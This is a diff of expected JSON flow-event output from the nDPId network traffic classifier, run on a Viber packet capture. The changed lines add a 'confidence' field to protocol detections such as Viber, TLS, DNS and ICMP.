-00655{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1527155639240,"flow_last_seen":1527155640252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6393,"flow_avg_l4_payload_len":290,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1527155639240,"flow_last_seen":1527155640252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6393,"flow_avg_l4_payload_len":290,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1527155640085,"flow_last_seen":1527155641008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6145,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1527155644240,"flow_last_seen":1527155644244,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"Google","breed":"Acceptable","category":"Web"}}
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1527155644240,"flow_last_seen":1527155644244,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1527155644240,"flow_last_seen":1527155644244,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1527155670640,"flow_last_seen":1527155677861,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":5405,"flow_avg_l4_payload_len":117,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155670640,"flow_last_seen":1527155670672,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1527155641697,"flow_last_seen":1527155647390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9565,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}}
-00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":120000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":2960,"flow_avg_l4_payload_len":1480,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1527155670640,"flow_last_seen":1527155677861,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":5405,"flow_avg_l4_payload_len":117,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155670640,"flow_last_seen":1527155670672,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1527155641697,"flow_last_seen":1527155647390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9565,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}}
+00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":120000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":2960,"flow_avg_l4_payload_len":1480,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1527155648513,"flow_last_seen":1527155648748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6479,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1527155638428,"flow_last_seen":1527155685200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":591,"flow_tot_l4_payload_len":5517,"flow_avg_l4_payload_len":95,"midstream":1,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":89,"flow_first_seen":1527155641845,"flow_last_seen":1527155647484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":58768,"flow_avg_l4_payload_len":660,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}}
-00623{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1527155638428,"flow_last_seen":1527155685200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":591,"flow_tot_l4_payload_len":5517,"flow_avg_l4_payload_len":95,"midstream":1,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":89,"flow_first_seen":1527155641845,"flow_last_seen":1527155647484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":58768,"flow_avg_l4_payload_len":660,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}}
+00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646968,"flow_last_seen":1527155666982,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Advertisement"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00588{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00567{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1527155671066,"flow_last_seen":1527155672061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7577,"flow_avg_l4_payload_len":280,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1527155679411,"flow_last_seen":1527155685088,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":4410,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155679411,"flow_last_seen":1527155679443,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1527155671066,"flow_last_seen":1527155672061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7577,"flow_avg_l4_payload_len":280,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1527155679411,"flow_last_seen":1527155685088,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":4410,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155679411,"flow_last_seen":1527155679443,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1527155646850,"flow_last_seen":1527155680789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":972,"flow_tot_l4_payload_len":6977,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
